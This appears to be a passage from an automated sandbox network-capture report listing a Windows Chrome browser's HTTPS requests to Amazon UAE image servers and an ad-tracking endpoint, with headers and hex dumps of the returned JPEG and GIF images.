                                                                                                                                                                                                                                                                      Data Ascii: =,[rYp8Z,a6&]em>XV/'AjXF9Imf^H~U}~Ekmn9qkeQS7Xopz?+Dh,'-#R/8/qu!:Z"Xt!y:B3 .t1bnd#1R F{X>AE6Y36k2l5YQ{z#TQ5J
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: c9 02 cb ad 4d b5 c9 12 4e d5 ac 71 57 7b 54 b9 95 79 5b 2d 53 6b 0a 2e 6b 4b f5 32 98 d1 ae 3d d1 39 de 68 a3 6c e2 fa 75 8e 2a ef 6a 9e 66 70 5d d6 91 5e 82 ea 24 ce 3a 59 65 1b a3 5c 7b ac a8 19 d2 74 39 ad 43 88 a7 58 e2 a4 05 4d a6 ad e3 97 f7 a5 b3 3d a7 b3 f9 b4 51 17 84 c8 e2 10 77 66 f7 d1 28 6d 32 ad e5 b3 84 68 b4 dd 4c ed e3 6e 97 be cc af 1f 0b 28 7d 6d c5 37 fc 47 44 47 da b3 7e d4 19 e1 f2 9a 7e 01 0d db 57 7d ae 0c ed a6 42 91 da 6f cd 70 d9 47 98 ff 00 7a 70 e2 b2 02 d8 34 20 56 47 f3 8a c9 2c 99 59 3e 4f 4c 3f 7d 81 77 89 14 ca d3 ed 57 70 f7 f0 02 c3 c9 42 4d 5f 56 0d e3 2a 22 60 14 4d 48 95 01 e0 47 c2 b5 99 35 d6 a8 ce 68 40 df bd 1b 6a 07 93 25 df 31 e9 e0 e0 8b bf d6 49 9e 95 c6 68 d6 3d 15 a6 6d 4f c3 b0 10 23 d5 34 53 45 3c fa a6
                                                                                                                                                                                                                                                                      Data Ascii: MNqW{Ty[-Sk.kK2=9hlu*jfp]^$:Ye\{t9CXM=Qwf(m2hLn(}m7GDG~~W}BopGzp4 VG,Y>OL?}wWpBM_V*"`MHG5h@j%1Ih=mO#4SE<
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC1378INData Raw: c6 2a c0 83 a8 30 3d 50 5f d1 e8 ac c6 e1 3f 35 3f 32 e7 e5 3b 3e 62 3c c8 f3 2e b8 23 26 17 a2 ea 6d 00 3e 53 87 b4 18 bd f8 6f 68 ef b2 28 e0 0e a4 e9 7f 57 6d fe 83 cf 37 0a 84 1a 10 a7 ac b4 87 c8 a8 4d 80 c0 17 79 23 40 ee 96 d8 55 be 34 7c 0a a3 06 e4 24 9b 92 9f 19 c9 bc 05 c9 d1 49 81 61 9f ef d1 77 30 3b 95 c1 a1 0a a1 e6 0f 4b 0f 5c 01 40 e1 94 13 ea 1c b9 a3 b7 45 b0 c8 0b 27 4f 81 fb 11 00 99 f7 92 09 a2 cd 58 59 ec 76 fa 64 43 04 a6 0c 41 4f 9a eb a0 cc 22 f1 46 73 dd 24 f4 c8 a1 1c 8a 75 d4 13 29 a0 e4 ab 6d 31 e8 aa 83 32 6f 03 2f af cd d3 31 e4 ca 53 a0 f3 74 74 83 b1 ec bd 30 a7 87 69 d0 05 1b 00 f1 37 2e 7f e9 bf ff c4 00 2a 10 01 00 01 03 02 05 04 02 03 01 01 00 00 00 00 00 01 11 00 21 31 41 51 10 61 71 81 a1 30 91 b1 f0 40 c1 20 d1 f1
                                                                                                                                                                                                                                                                      Data Ascii: *0=P_?5?2;>b<.#&m>Soh(Wm7My#@U4|$Iaw0;K\@E'OXYvdCAO"Fs$u)m12o/1Stt0i7.*!1AQaq0@
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC500INData Raw: d0 03 ac bc cc 5d 48 a4 4c d2 c7 06 cf 26 b6 2d 22 b7 85 50 20 56 4a 57 24 01 c3 06 a4 5a c3 80 ef 77 60 5a 98 ae c3 bb 7a 39 93 e0 05 20 d7 2b 89 bc 92 eb 6e f2 8a 73 38 e5 a5 1d 5c 88 53 c1 2c 0b b0 5d a1 c6 13 c5 0b 48 e9 0e ee 11 ee 07 aa e5 60 4b 39 ea 2e 7c 23 25 16 5c f5 56 cb f5 14 99 eb d6 ad 7c d8 48 f3 a6 e0 52 54 7b 91 0b fa b9 aa 25 33 07 53 75 d0 5c fe c1 11 99 80 4e 27 77 bf 0c 06 b2 1b d6 ef 05 25 93 9b 12 c9 dd 78 4b 78 66 de 66 05 91 9b b6 b3 05 04 01 60 ad 57 93 96 6f 62 d1 10 20 0b 1e b2 1c 4a 92 83 73 3c e6 05 bd 09 99 89 a0 cf 70 6a ac 68 a5 1a 3b a5 4c 77 f5 cf 46 3a a9 49 47 0f 8a 95 00 5d 2f 60 75 cb 0d 80 a9 9d 38 6d 44 cd 82 f8 e3 14 bc a7 56 78 c7 df 47 c5 3c ab d6 62 fc c5 e3 b7 f0 1e ce 48 0e 6d 43 5b d5 02 3f 52 a4 14 14 28
                                                                                                                                                                                                                                                                      Data Ascii: ]HL&-"P VJW$Zw`Zz9 +ns8\S,]H`K9.|#%\V|HRT{%3Su\N'w%xKxff`Wob Js<pjh;LwF:IG]/`u8mDVxG<bHmC[?R(


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      60192.168.2.54978518.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC685OUTGET /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Toys_EN_1x._SY116_CB567104843_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC922INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3176
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: e121654b-9178-4c4d-a086-0b4da95aee6b
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 11:51:03 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 07:30:47 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-725,/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Toys_EN_1x
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:51:03 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-725 /images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_Toys_EN_1x
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 b5831686bbaffa69458853f1db0eca2a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 373565
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: RRSl_LaJ204ouHWueX7Ja8PQ7VOhIiFA-VG2MmchDc3nvgH6FnLe_g==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC3176INData Raw: ff d8 ff db 00 84 00 0e 0a 0a 0a 0b 0a 0e 0b 0b 0e 14 0d 0b 0d 14 18 12 0e 0e 12 18 1b 16 16 17 16 16 1b 1a 14 17 17 17 17 14 1a 1a 1f 20 23 20 1f 1a 29 29 2d 2d 29 29 3d 3b 3b 3b 3d 40 40 40 40 40 40 40 40 40 40 01 0f 0d 0d 0f 11 0f 12 10 10 12 14 0e 11 0e 14 17 12 14 14 12 17 21 17 17 19 17 17 21 2a 1e 1a 1a 1a 1a 1e 2a 26 29 23 23 23 29 26 2f 2f 2a 2a 2f 2f 3a 3a 38 3a 3a 40 40 40 40 40 40 40 40 40 40 ff dd 00 04 00 0c ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 00 74 00 ba 03 00 22 00 01 11 01 02 11 01 ff c4 00 9e 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 06 02 03 05 07 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 04 05 03 01 06 10 00 01 03 03 02 03 05 03 09 07 05 01 00 00 00 00 01 00 02 03 04 05 11 12
                                                                                                                                                                                                                                                                      Data Ascii: # ))--))=;;;=@@@@@@@@@@!!**&)###)&//**//::8::@@@@@@@@@@Adobedt"


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      61192.168.2.54978418.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5219
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 6168fb29-678c-43cf-9155-6466759328b6
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 11:53:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-142,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:53:59 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-142 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 72aa637991c46f23f831d2a4b7cb6c9a.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 366156
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: wc2pFx38nUgkFz6zofLLdGwXE00iBX5Yn1sjItJhc8P3wWxg7wkGxg==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC5219INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 aa 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 07 08 04 05 06 03 09 10 00 02 01 03 03 03 02 02 06 06 08 05 05 00 00 00 01 02 03 00 04 11 05 12 21 06 13 31 22 51 07 41 08 14 32 42 61 71 23 52 53 81 91 92 15 17 33 54 62 a1
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1"QA2Baq#RS3Tb


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      62192.168.2.54978618.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC934INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4642
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 9c8ce665-1451-495b-89af-4e6a4f920c31
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 11:53:59 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-092,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:53:59 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-092 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944617_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 69b7884048ebe8b1ecf8d8ec9d39c85c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 373474
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 3Q9rVajWR4KQijxVSmpYC_liDu74rlkZRua4-C3fPRDrmwpUHGufgw==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC4642INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 03 03 03 06 04 06 06 06 06 08 0d 09 09 08 09 09 10 0c 09 0c 0b 0f 09 0b 0b 0f 0b 0f 0f 0b 0d 0f 0d 0d 11 0f 0d 0d 0f 11 0d 0f 10 17 10 12 10 14 11 10 15 10 17 10 17 16 16 17 19 1a 17 0f 19 23 01 06 06 03 06 06 06 08 06 06 0d 15 0f 09 11 16 12 08 10 1a 16 1a 11 16 17 16 16 10 1d 16 1a 15 16 0d 17 16 11 14 14 11 11 12 10 12 16 11 17 17 17 09 10 17 15 0f 1f 10 11 0f 16 15 19 14 0f 17 1c ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 b0 00 00 01 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 02 07 08 01 03 04 05 06 09 10 00 02 01 03 02 03 04 04 09 0b 02 06 03 00 00 00 01 02 03 00 04 11 05 21 06 12 31 07 13 41 51 32 61 71 92 08 14 22 42 52 53 91 c1 d1 15 17 23 62 73 81
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#t"!1AQ2aq"BRS#bs


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      63192.168.2.54979052.95.121.1954432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC827OUTGET /x/px/RIvbt4KWdIib_MEoD1J-U6gAAAGRdjK04QMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICA2QY_d/v/%7B%22wh%22:907,%22ww%22:1280,%22sx%22:0,%22sy%22:0,%22ah%22:19,%22aw%22:300,%22top%22:519,%22left%22:959.984375,%22v%22:%7B%22p%22:50,%22t%22:1,%22def%22:%22iab%22%7D,%22ptv%22:1724264922.216,%22ttv%22:1724264922.216%7D HTTP/1.1
                                                                                                                                                                                                                                                                      Host: aax-eu.amazon.ae
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC330INHTTP/1.1 200
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:44 GMT
                                                                                                                                                                                                                                                                      Content-Type: image/gif
                                                                                                                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      x-amz-rid: JGHKSC3021AX2TTCTRSA
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 00 00 00 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                                      Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      64192.168.2.54978718.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC935INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 5599
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 6be841b1-7c8b-469c-9c16-030ccec742a7
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 06:43:55 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-444,/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 06:43:55 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-444 /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 3f2f1c546e63f10a66abd1c978af36f6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 215089
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: t0sVEdyBL-Qg5GDcneibpJsN-4thqBBm5d8pqD31IU1vOw_b471qgQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC5599INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 05 01 04 06 07 08 09 0a 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 b5 b7 db f1 a4 b6 ed 5d
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9]


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      65192.168.2.549793151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC471OUTGET /images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924072_186x116_1X_en_AE._SY116_CB566513340_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:44 UTC657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 4937
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 250b8774-9304-4e70-9ba9-9111e2a05148
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 09 Aug 2024 13:38:27 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 04 Aug 2044 20:48:29 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
